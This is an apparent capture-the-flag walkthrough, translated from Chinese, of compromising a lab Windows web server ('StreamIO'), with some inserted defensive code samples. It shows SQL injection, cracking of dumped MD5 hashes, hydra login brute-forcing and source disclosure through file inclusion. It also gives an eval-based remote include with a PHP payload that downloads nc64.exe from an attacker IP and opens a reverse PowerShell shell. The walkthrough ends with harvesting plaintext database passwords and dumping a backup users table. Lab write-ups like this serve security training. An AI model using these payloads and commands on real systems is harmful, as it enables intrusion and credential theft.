It is an online movie streaming site. Click through roughly all of its features looking for valuable information. Under About Us there is information on the site's administrators and developers; stay alert to this, because it is likely very valuable, so note it down first. There is also an e-mail address at the bottom, which we note down as well:
In the Contact Us form, we can test for basic XSS:
Although the form can be submitted, if this is not a reflected XSS we cannot yet say there is no XSS vulnerability unless we can find the page where the submitted information is stored; set it aside for now. Looking at the Network tab of the console:
This shows that the IIS server is configured to support ASP and possibly ASP.NET as well, and it exposes the PHP version. Record this information for now, and when exploiting later, don't forget to try aspx.
There is also a login form; try SQL injection:
Neither weak passwords nor registering and then logging in succeed.
Run directory brute-forcing against both https sites as well, and leave them running in the background.
Note: there is a certificate problem here:
Error: error on running gobuster: unable to connect to https://streamio.htb/: Get "https://streamio.htb/": tls: failed to verify certificate: x509: certificate has expired or is not yet valid: current time 2024-02-21T15:05:43+08:00 is after 2022-03-24T07:03:28Z
Adding the -k flag solves it. Then continue exploring the functionality of the watch subdomain site:
There is only a subscription feature to try; entering an e-mail address does nothing special.
In environments with many assets, it is best to cross-check directory brute-forcing with a second tool, for example feroxbuster:
┌──(root㉿hunter)-[/home/cvestone]
└─# feroxbuster -u https://streamio.htb -x php -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.1
───────────────────────────┬──────────────────────
🎯 Target Url │ https://streamio.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 151c https://streamio.htb/images => https://streamio.htb/images/
301 GET 2l 10w 150c https://streamio.htb/admin => https://streamio.htb/admin/
301 GET 2l 10w 147c https://streamio.htb/js => https://streamio.htb/js/
301 GET 2l 10w 148c https://streamio.htb/css => https://streamio.htb/css/
200 GET 231l 571w 7825c https://streamio.htb/about.php
...
Across these directory brute-force runs, the valuable findings are as follows:
200 GET 2l 6w 58c https://streamio.htb/admin/master.php
200 GET 7193l 19558w 253905c https://watch.streamio.htb/search.php
200 GET 20l 47w 677c https://watch.streamio.htb/blocked.php
/images (Status: 301) [Size: 151] [--> https://streamio.htb/images/]
/Images (Status: 301) [Size: 151] [--> https://streamio.htb/Images/]
/admin (Status: 301) [Size: 150] [--> https://streamio.htb/admin/]
/css (Status: 301) [Size: 148] [--> https://streamio.htb/css/]
/js (Status: 301) [Size: 147] [--> https://streamio.htb/js/]
/fonts (Status: 301) [Size: 150] [--> https://streamio.htb/fonts/]
/IMAGES (Status: 301) [Size: 151] [--> https://streamio.htb/IMAGES/]
/Fonts (Status: 301) [Size: 150] [--> https://streamio.htb/Fonts/]
/Admin (Status: 301) [Size: 150] [--> https://streamio.htb/Admin/]
/*checkout* (Status: 400) [Size: 3420]
/CSS (Status: 301) [Size: 148] [--> https://streamio.htb/CSS/]
/JS (Status: 301) [Size: 147] [--> https://streamio.htb/JS/]
Visit a few of the key directories:
Many of these key findings were only discovered by feroxbuster, so using just one tool is often not enough.
Among them, master.php gives a crucial hint: it says the page can only be reached through includes, suggesting a possible file inclusion vulnerability. The presence of blocked.php indicates that the back end very likely has a WAF, and some generic behaviour is probably blocked. The subdomain site also exposes a search page, search.php, which clearly interacts with the database, so we can try SQL injection.
SQL injection
Probing:
The search supports fuzzy, case-insensitive matching, which suggests the back-end SQL statement looks something like:
SELECT * FROM movies WHERE name LIKE '%[input]%';
When we append some special SQL injection characters, results are still returned normally:
This indicates a SQL injection vulnerability, because normally such input should not be passed to the back-end database and executed successfully. When we try to enter some generic SQL statements directly, the WAF blocks them, for example anything containing all (although it says blocked for 5 minutes, on a lab machine we only need to go back to the form page to search again).
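As an added example (not part of the original writeup), the inferred query above rendered in Python against an in-memory sqlite3 table, beside a parameterised version. The table and movie names are constructed, and sqlite3 stands in for the target's MSSQL so the code runs offline; the string concatenation, which is the actual defect, is identical in both.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's movies table (sqlite3 instead of MSSQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO movies (name) VALUES (?)",
        [("Iron Man",), ("The Matrix",), ("Alien",)],
    )
    return conn


def search_vulnerable(conn, user_input):
    """Mirrors the inferred back end: the input is spliced straight into the LIKE pattern.

    Any quote or wildcard in user_input becomes part of the SQL text, so the WHERE
    clause no longer says what the developer meant.
    """
    query = "SELECT name FROM movies WHERE name LIKE '%" + user_input + "%'"
    return [row[0] for row in conn.execute(query)]


def search_safe(conn, user_input):
    """Hardened form: the whole pattern is bound as a parameter.

    Binding keeps quotes inert; escaping % and _ additionally stops the caller
    from widening the match with LIKE wildcards (a separate, lesser issue).
    """
    escaped = (
        user_input.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    )
    query = "SELECT name FROM movies WHERE name LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(query, ("%" + escaped + "%",))]


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "matrix"))          # the intended fuzzy search
    print(search_vulnerable(db, "' OR 1=1 --"))     # concatenation: whole table
    print(search_safe(db, "' OR 1=1 --"))           # bound parameter: literal text, no match
```

Normal input behaves the same in both versions; the difference shows only when the input contains SQL metacharacters, which is exactly what the probing step above exercised.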
Begin the standard SQL injection workflow:
Find the injection point and try to obtain more data:
Version information:
Enumerate the databases:
The current database is clearly STREAMIO; also note that streamio_backup is important too, as both databases may well hold credentials usable for credential stuffing.
View the current database:
Get the names and identifiers of all user tables in the current database:
Note these two corresponding IDs and continue to get the matching column names:
Obtain the key credentials:
Extract all credentials and process the data:
First copy the HTML of the div containing all the credentials:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# head -n 20 creds_in_html.txt
<div class="d-flex movie align-items-end">
<div class="mr-auto p-2">
<h5 class="p-2">admin :665a50ac9eaa781e4f7f04199db97a11 </h5>
</div>
<div class="ms-auto p-2">
<span class="">3</span>
<button class="btn btn-dark" onclick="unavailable();">Watch</button>
</div>
</div><div class="d-flex movie align-items-end">
<div class="mr-auto p-2">
<h5 class="p-2">Alexendra :1c2b3d8270321140e5153f6637d3ee53 </h5>
</div>
<div class="ms-auto p-2">
<span class="">3</span>
<button class="btn btn-dark" onclick="unavailable();">Watch</button>
</div>
</div><div class="d-flex movie align-items-end">
<div class="mr-auto p-2">
<h5 class="p-2">Austin :0049ac57646627b8d7aeaccf8b6a936f </h5>
</div>
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# grep h5 creds_in_html.txt | sed -e 's/<h5 class="p-2">//g' -e 's/<\/h5>//g' | tr -d " \t" | tee creds.txt
admin:665a50ac9eaa781e4f7f04199db97a11
Alexendra:1c2b3d8270321140e5153f6637d3ee53
Austin:0049ac57646627b8d7aeaccf8b6a936f
Barbra:3961548825e3e21df5646cafe11c6c76
Barry:54c88b2dbd7b1a84012fabc1a4c73415
Baxter:22ee218331afd081b0dcd8115284bae3
Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8
Carmon:35394484d89fcfdb3c5e447fe749d213
Clara:ef8f3d30a856cf166fb8215aca93e9ff
Diablo:ec33265e5fc8c2f1b0c137bb7b3632b5
Garfield:8097cedd612cc37c29db152b6e9edbd3
Gloria:0cfaaaafb559f081df2befbe66686de0
James:c660060492d9edcaa8332d89c99c9239
Juliette:6dcd87740abb64edfa36d170f0d5450d
Lauren:08344b85b329d7efd611b7a7743e8a09
Lenord:ee0b8a0937abd60c2882eacb2f8dc49f
Lucifer:7df45a9e3de3863807c026ba48e55fb3
Michelle:b83439b16f844bd6ffe35c02fe21b3c0
Oliver:fd78db29173a5cf701bd69027cb9bf6b
Robert:f03b910e2bd0313a23fdd7575f34a694
Robin:dc332fb5576e9631c9dae83f194f8e70
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5
Samantha:083ffae904143c4796e464dac33c1f7d
Stan:384463526d288edcc95fc3701e523bc7
Thane:3577c47eb1e12c8ba021611e1280753c
Theodore:925e5408ecb67aea449373d668b7359e
Victor:bf55e15b119860a6e6b5a164377da719
Victoria:b22abb47a02b52d5dfa27fb0b534f693
William:d62be0dc82071bccc1322d64ec5b6c51
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332
Cracking the credential hashes
First copy any one of the hash values and identify the hash type:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hash-identifier 3961548825e3e21df5646cafe11c6c76
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
...
It is identified as MD5, so start cracking:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hashcat creds.txt /usr/share/wordlists/rockyou.txt --user -m 0
hashcat (v6.2.6) starting
...
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hashcat creds.txt /usr/share/wordlists/rockyou.txt --user -m 0 --show
admin:665a50ac9eaa781e4f7f04199db97a11:paddpadd
Barry:54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
Clara:ef8f3d30a856cf166fb8215aca93e9ff:%$clara
Juliette:6dcd87740abb64edfa36d170f0d5450d:$3xybitch
Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
Lenord:ee0b8a0937abd60c2882eacb2f8dc49f:physics69i
Michelle:b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
Thane:3577c47eb1e12c8ba021611e1280753c:highschoolmusical
Victoria:b22abb47a02b52d5dfa27fb0b534f693:!5psycho8!
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
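The two manual steps above, pulling user:hash pairs out of the dumped HTML and guessing the hash type before handing the list to hashcat, as one added Python example (not part of the original writeup). The HTML sample is the first three entries from creds_in_html.txt above; the length-based classifier reproduces only the top guesses hash-identifier printed, and the verifier shows how hashcat -m 0 confirms a crack, namely by recomputing an unsalted MD5.

```python
import hashlib
import re
from html.parser import HTMLParser

# Constructed sample: the first three entries copied from the dumped search results above.
SAMPLE_HTML = """
<div class="d-flex movie align-items-end">
<div class="mr-auto p-2">
<h5 class="p-2">admin :665a50ac9eaa781e4f7f04199db97a11 </h5>
</div>
</div><div class="d-flex movie align-items-end">
<div class="mr-auto p-2">
<h5 class="p-2">Alexendra :1c2b3d8270321140e5153f6637d3ee53 </h5>
</div>
</div><div class="d-flex movie align-items-end">
<div class="mr-auto p-2">
<h5 class="p-2">Austin :0049ac57646627b8d7aeaccf8b6a936f </h5>
</div>
</div>
"""


class CredExtractor(HTMLParser):
    """Collects the text content of every <h5> element (where the dump placed user:hash)."""

    def __init__(self):
        super().__init__()
        self._in_h5 = False
        self._buf = []
        self.entries = []

    def handle_starttag(self, tag, attrs):
        if tag == "h5":
            self._in_h5 = True
            self._buf = []

    def handle_data(self, data):
        if self._in_h5:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "h5" and self._in_h5:
            self._in_h5 = False
            self.entries.append("".join(self._buf))


def extract_credentials(html):
    """Return {username: hex_digest}, tolerating the stray spaces around the colon."""
    parser = CredExtractor()
    parser.feed(html)
    parser.close()
    creds = {}
    for text in parser.entries:
        user, sep, digest = text.partition(":")
        if sep:
            creds[user.strip()] = digest.strip().lower()
    return creds


# Candidate algorithms by hex digest length, the same heuristic hash-identifier leads with.
HEX_LENGTHS = {32: ["MD5", "NTLM", "MD4"], 40: ["SHA-1"], 64: ["SHA-256"], 128: ["SHA-512"]}


def classify_hash(digest):
    """Length-based candidates; [] if the string is not plain hex."""
    digest = digest.lower()
    if not re.fullmatch(r"[0-9a-f]+", digest):
        return []
    return HEX_LENGTHS.get(len(digest), [])


def hashcat_input(creds):
    """user:hash lines, the layout hashcat expects with --user."""
    return "\n".join(f"{u}:{h}" for u, h in creds.items())


def verify_cracked(digest, candidate):
    """True if the unsalted MD5 of candidate equals digest (what a -m 0 crack asserts)."""
    return hashlib.md5(candidate.encode()).hexdigest() == digest.lower()
```

The 32-character length alone cannot distinguish MD5 from NTLM or MD4, which is why hash-identifier lists all three; the cracking run settles it. Unsalted MD5 is also the reason a single rockyou pass recovered twelve of thirty passwords here.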
Save this as a new credentials file, then store the usernames and passwords in separate files:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat cracked_creds.txt | cut -d: -f1 > user
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat cracked_creds.txt | cut -d: -f3 > pass
Attempting to brute-force SMB shares
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb streamio.htb -u user -p pass --continue-on-success
...
impacket.smb3.SessionError: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
...
Clearly these credentials cannot be used to access SMB shares. Since a system-level login fails, we can still try the web level, because there was also a login page earlier:
Attempting to brute-force the web login
Since the hashes are no longer needed for cracking, process the data again:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat cracked_creds.txt | cut -d: -f1,3 | tee userpass
admin:paddpadd
Barry:$hadoW
Bruno:$monique$1991$
Clara:%$clara
Juliette:$3xybitch
Lauren:##123a8j8w5123##
Lenord:physics69i
Michelle:!?Love?!123
Sabrina:!!sabrina$
Thane:highschoolmusical
Victoria:!5psycho8!
yoshihide:66boysandgirls..
Start brute-forcing; before doing so, make sure to identify the relevant form field names and the keyword in the error page:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hydra -C userpass streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:failed"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-25 17:09:40
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries, ~1 try per task
[DATA] attacking http-post-forms://streamio.htb:443/login.php:username=^USER^&password=^PASS^:failed
[443][http-post-form] host: streamio.htb login: yoshihide password: 66boysandgirls..
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-25 17:09:45
With these credentials we log in to the web site successfully. It looks no different from before, but trying the admin directory shows that these credentials give access to the back-end console:
This page is especially bare; it clearly was not built with a public CMS framework and is most likely hand-written, so the chance of bugs is high. After browsing the back end's features, nothing of great value stands out for now. However, since the URL changes when clicking each feature, and each feature has a corresponding parameter, hidden parameters may well exist, which is plausible given developers' habits, so we can try fuzzing them.
Attempting to brute-force URL parameters
Note that since we are fuzzing while logged in, remember to specify the current cookie value:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# wfuzz -u https://streamio.htb/admin/?FUZZ= -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "cookie: PHPSESSID=pv555d6n9ruo2s7btcml2nli93"
...
000000791: 200 49 L 131 W 1678 Ch "batchExtend"
000000790: 200 49 L 131 W 1678 Ch "batch"
000000789: 200 49 L 131 W 1678 Ch "baslik"
000000788: 200 49 L 131 W 1678 Ch "basket"
000000787: 200 49 L 131 W 1678 Ch "basic"
000000786: 200 49 L 131 W 1678 Ch "baseurl"
000000785: 200 49 L 131 W 1678 Ch "basemodule"
...
# On the first run, first exclude the response length that is very long and makes up the majority of responses; here it is 1678
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# wfuzz -u https://streamio.htb/admin/?FUZZ= -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "cookie: PHPSESSID=pv555d6n9ruo2s7btcml2nli93" --hh 1678
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://streamio.htb/admin/?FUZZ=
Total requests: 6453
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001575: 200 49 L 137 W 1712 Ch "debug"
000003530: 200 10790 L 25878 W 320235 Ch "movie"
000005450: 200 398 L 916 W 12484 Ch "staff"
000006133: 200 62 L 160 W 2073 Ch "user"
Total time: 0
Processed Requests: 6453
Filtered Requests: 6449
Requests/sec.: 0
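The baseline filtering done by hand above (spot the dominant response length, then rerun with --hh) as an added Python example, not part of the original writeup. It parses wfuzz's default result lines, takes the most common response length as the "parameter ignored" baseline, and reports the payloads that deviate from it; the sample lines are taken from the two runs above and the tolerance argument is an addition so near-baseline responses such as debug (34 bytes longer) can be kept or dropped deliberately.

```python
import re
from collections import Counter

# Constructed sample: result lines in wfuzz's default output format, copied from the runs above.
SAMPLE_OUTPUT = """
000000791:   200        49 L     131 W      1678 Ch     "batchExtend"
000000790:   200        49 L     131 W      1678 Ch     "batch"
000000789:   200        49 L     131 W      1678 Ch     "baslik"
000000788:   200        49 L     131 W      1678 Ch     "basket"
000000787:   200        49 L     131 W      1678 Ch     "basic"
000001575:   200        49 L     137 W      1712 Ch     "debug"
000003530:   200     10790 L   25878 W    320235 Ch     "movie"
000005450:   200       398 L     916 W     12484 Ch     "staff"
000006133:   200        62 L     160 W      2073 Ch     "user"
"""

# id: status lines L words W chars Ch "payload"
LINE_RE = re.compile(r'^(\d+):\s+(\d+)\s+(\d+) L\s+(\d+) W\s+(\d+) Ch\s+"(.*)"\s*$')


def parse_wfuzz(text):
    """Turn wfuzz result lines into (payload, status, lines, words, chars); skip anything else."""
    results = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            _, status, lines, words, chars, payload = m.groups()
            results.append((payload, int(status), int(lines), int(words), int(chars)))
    return results


def baseline_chars(results):
    """Most common response length: what the page returns when the fuzzed parameter is ignored."""
    return Counter(r[4] for r in results).most_common(1)[0][0]


def filter_baseline(results, tolerance=0):
    """Equivalent of wfuzz --hh <baseline>: payloads whose length differs from the baseline."""
    base = baseline_chars(results)
    return [r[0] for r in results if abs(r[4] - base) > tolerance]


if __name__ == "__main__":
    parsed = parse_wfuzz(SAMPLE_OUTPUT)
    print("baseline:", baseline_chars(parsed))
    print("interesting:", filter_baseline(parsed))
```

A non-zero tolerance is useful when the page embeds the parameter name or a timestamp in the body, which makes every response differ by a few bytes and would otherwise defeat an exact --hh filter.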
A hidden parameter debug indeed exists; try accessing it:
Apart from a hint there is nothing special, and the source shows nothing either. But recall the hidden file /admin/master.php found during directory brute-forcing, which said it must be included to be accessed. Here we have a ?debug= parameter, so try using that file as the parameter's value, i.e. include it. It can indeed be accessed, and the file's content is exactly the collection of the existing features:
This does not look useful, but given the situation we can boldly infer that a file inclusion vulnerability probably exists. Normally we cannot read the source of this PHP file, because when the browser includes or accesses it, it is parsed automatically; but since we are in debug mode, we can retrieve the PHP source through a PHP wrapper (pseudo-protocol).
Leaking PHP source via the file inclusion vulnerability
We can use the wrapper to encode the included PHP file as base64, then copy it locally and decode it:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat master_base64 | base64 -d | tee master.php
...
PHP code review
<h1>Movie managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
if(isset($_POST['movie_id']))
{
$query = "delete from movies where id = ".$_POST['movie_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from movies order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['movie']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST" action="?movie=">
<input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
$query = "select * from users where is_staff = 1 ";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
if(isset($_POST['staff_id']))
{
?>
<div class="alert alert-success"> Message sent to administrator</div>
<?php
}
$query = "select * from users where is_staff = 1";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['username']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST">
<input type="hidden" name="staff_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>User managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
if(isset($_POST['user_id']))
{
$query = "delete from users where is_staff = 0 and id = ".$_POST['user_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from users where is_staff = 0";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['username']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST">
<input type="hidden" name="user_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<form method="POST">
<input name="include" hidden>
</form>
<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" )
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>
Audit analysis:
The key is the final part: if the value of $_POST['include'] is not equal to index.php, the content of the file named by the $_POST['include'] parameter is executed through eval(). That means we can use it to build a reverse shell, which follows naturally.
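As an added hardening example (not the target's own master.php), the same logic with the defects visible in the audited code removed: the DELETE statements concatenate $_POST values straight into SQL, the rows are echoed into HTML unescaped, and the include handler hands attacker-chosen content to eval(). $handle is assumed to be the sqlsrv connection opened by the including page, as in the original, and the fragments/ paths are assumed.

```php
<?php
// Added hardening example, not the original master.php from the target.
// $handle is assumed to be the sqlsrv connection resource opened by the
// including page (index.php in the audited application).

if (!defined('included')) {
    die("Only accessible through includes");
}

// 1. Parameterised delete: sqlsrv_query() takes a parameter array, so the id
//    never becomes part of the SQL text. The digit check is a second line of
//    defence and rejects payloads such as "1 or 1=1".
function delete_movie($handle, $movie_id): bool
{
    if (!ctype_digit((string)$movie_id)) {
        return false;
    }
    $sql = "DELETE FROM movies WHERE id = ?";
    $res = sqlsrv_query($handle, $sql, [(int)$movie_id]);
    return $res !== false;
}

function delete_user($handle, $user_id): bool
{
    if (!ctype_digit((string)$user_id)) {
        return false;
    }
    // is_staff = 0 stays in the query so staff rows can never be deleted here
    $sql = "DELETE FROM users WHERE is_staff = 0 AND id = ?";
    $res = sqlsrv_query($handle, $sql, [(int)$user_id]);
    return $res !== false;
}

// 2. Replace the eval() include with a fixed allowlist of page fragments.
//    Anything not in the map ("index.php", "../x", a http:// URL) is rejected,
//    and the chosen fragment is loaded with require, never eval. The
//    fragments/ layout is assumed for this example.
const ALLOWED_FRAGMENTS = [
    'movies' => __DIR__ . '/fragments/movies.php',
    'staff'  => __DIR__ . '/fragments/staff.php',
    'users'  => __DIR__ . '/fragments/users.php',
];

function resolve_fragment(string $name): ?string
{
    // No path or URL is ever derived from the request value itself.
    return ALLOWED_FRAGMENTS[$name] ?? null;
}

// 3. Escape every database value before echoing it into HTML; the audited
//    file echoed $row['movie'] and $row['username'] raw.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Request handling, functionally equivalent to the audited file
if (isset($_POST['movie_id'])) {
    delete_movie($handle, $_POST['movie_id']);
}
if (isset($_POST['user_id'])) {
    delete_user($handle, $_POST['user_id']);
}

$res = sqlsrv_query($handle, "SELECT id, movie FROM movies ORDER BY movie", [],
                    ["Scrollable" => "buffered"]);
while ($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC)) {
    echo '<h4>' . h($row['movie']) . '</h4>';
}

if (isset($_POST['include'])) {
    $path = resolve_fragment((string)$_POST['include']);
    if ($path === null) {
        echo " ---- ERROR ---- ";
    } else {
        require $path;
    }
}
```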
File inclusion combined with a reverse shell
First prepare nc64.exe, then build the PHP script:
system("powershell -c wget 10.10.16.10/nc64.exe -outfile \\programdata\\nc64.exe");
system("\\programdata\\nc64.exe -e powershell 10.10.16.10 443");
The binary is dropped under the programdata directory because that shared directory is accessible to all users.
At the same time, start a web server locally with python and set up the nc listener.
Next, either burpsuite or curl can complete the rest; for clarity curl is used here:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# curl -X POST 'https://streamio.htb/admin/?debug=master.php' -k -b 'PHPSESSID=pv555d6n9ruo2s7btcml2nli93' -d 'include=http://10.10.16.10/revshell.php'
After running the command above, a shell comes back to our local nc listener:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# nc -lnvp 443
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.225.176:51663.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\inetpub\streamio.htb\admin> whoami
whoami
streamio\yoshihide
PS C:\inetpub\streamio.htb\admin> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
However, we have not found the flag user.txt; this user has no corresponding home directory and very few usable privileges, so this is just an ordinary webshell. To make the shell more interactive we can use the tool rlwrap: wrap the nc listener with it and catch the shell again:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# rlwrap -cAr nc -lnvp 443
Attempting lateral movement
Inspect the database-connection part of the PHP files to see whether any credentials leak
PS C:\inetpub\streamio.htb> dir -recurse *.php | select-string -pattern "database"
dir -recurse *.php | select-string -pattern "database"
admin\index.php:9:$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
login.php:46:$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
register.php:81: $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
PS C:\inetpub\streamio.htb> cd ../watch.streamio.htb
cd ../watch.streamio.htb
PS C:\inetpub\watch.streamio.htb> dir -recurse *.php | select-string -pattern "database"
dir -recurse *.php | select-string -pattern "database"
search.php:15:$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
PS C:\inetpub\watch.streamio.htb>
We did obtain some credentials; db_admin is the most interesting, since the name suggests it is very likely the administrator user of SQL Server.
Trying to connect to SQL Server
First check whether the target has an interactive client for connecting to SQL Server:
PS C:\inetpub\watch.streamio.htb> where.exe sqlcmd
where.exe sqlcmd
C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\SQLCMD.EXE
Since we improved the shell's interactivity with rlwrap, the following steps can be done directly on the target; otherwise (or if the target is slow or you prefer to leave fewer traces of activity) use port forwarding and work from our kali. Start the connection:
PS C:\inetpub\watch.streamio.htb> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT name FROM sys.tables;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT name FROM sys.tables;"
name
--------------------------------------------------------------------------------------------------------------------------------
movies
users
(2 rows affected)
PS C:\inetpub\watch.streamio.htb> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT * FROM users;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT * FROM users;"
id username password
----------- -------------------------------------------------- --------------------------------------------------
1 nikk37 389d14cb8e4e9b94b137deb1caf0612a
2 yoshihide b779ba15cedfd22a023c4d8bcf5f2332
3 James c660060492d9edcaa8332d89c99c9239
4 Theodore 925e5408ecb67aea449373d668b7359e
5 Samantha 083ffae904143c4796e464dac33c1f7d
6 Lauren 08344b85b329d7efd611b7a7743e8a09
7 William d62be0dc82071bccc1322d64ec5b6c51
8 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5
(8 rows affected)
Here we chose to query the data in the streamio_backup backup database, because backup databases often contain historical user credentials that cannot be found in the current database, and the streamio database has already been used by us.
